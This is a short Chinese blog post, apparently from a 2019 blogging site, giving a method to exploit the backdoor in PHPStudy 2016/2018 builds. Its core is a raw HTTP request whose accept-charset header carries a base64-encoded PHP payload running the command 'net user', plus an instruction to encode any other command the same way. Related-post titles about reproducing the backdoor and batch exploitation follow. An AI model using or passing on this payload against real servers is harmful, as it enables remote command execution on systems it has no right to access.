PHPStudy后门利用方法

作者: 这是什么娃哈哈 | 来源:发表于2019-10-04 14:14 被阅读0次

PHPStudy后门利用方法
phpstudy后门利用方式
phpstudy后门复现
phpstudy后门验证方式
phpstudy后门漏洞复现
phpstudy后门分析与复现
phpStudy漏洞复现
phpstudy 后门批量利用脚本改良版 ——yzddMr6
Phpstudy隐藏后门2019-09-24
有染PHPStudy_BackDoor

漏洞版本
Phpstudy 2016版 php-5.4
Phpstudy 2018版 php-5.2.17
Phpstudy 2018版 php-5.4.45

数据包

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
accept-charset后面的参数base64编码即可

image.png

PHPStudy后门利用方法
漏洞版本Phpstudy 2016版 php-5.4Phpstudy 2018版 php-5.2.17Phps...
phpstudy后门利用方式
随意访问任何一个文件 0x01 Accept-Encoding字段中，gzip和deflate之间的逗号后的空格去...
phpstudy后门复现
ps：当时出的时候就复现了，但是由于种种原因（当初粗心，没好好留意）没有成功，今天终于成功了目前已知受影响的ph...
phpstudy后门验证方式
GET / HTTP/1.1 Host: 0.0.0.0 User-Agent: Mozilla/5.0 (Win...
phpstudy后门漏洞复现
phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包，其通过集成Apache、PHP...
phpstudy后门分析与复现
小白白也要复现！ phpstudy简介 phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apa...
phpStudy漏洞复现
漏洞简介关于phpStudy的后门漏洞可参考https://blog.csdn.net/weixin_43886...
phpstudy 后门批量利用脚本改良版 ——yzddMr6
前言看到新闻后本来以为影响范围小没多大事。。。直到发现自己的两个电脑全都中招了才意识到问题大了。。。不过还好...
Phpstudy隐藏后门2019-09-24
1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包，通过集成Apache、PHP、My...
有染PHPStudy_BackDoor
前不久PHPStudy几乎要被玩坏，几乎没有什么技术水准的利用方式，破坏性却是巨大的。笔者亦是PHPStudy的铁...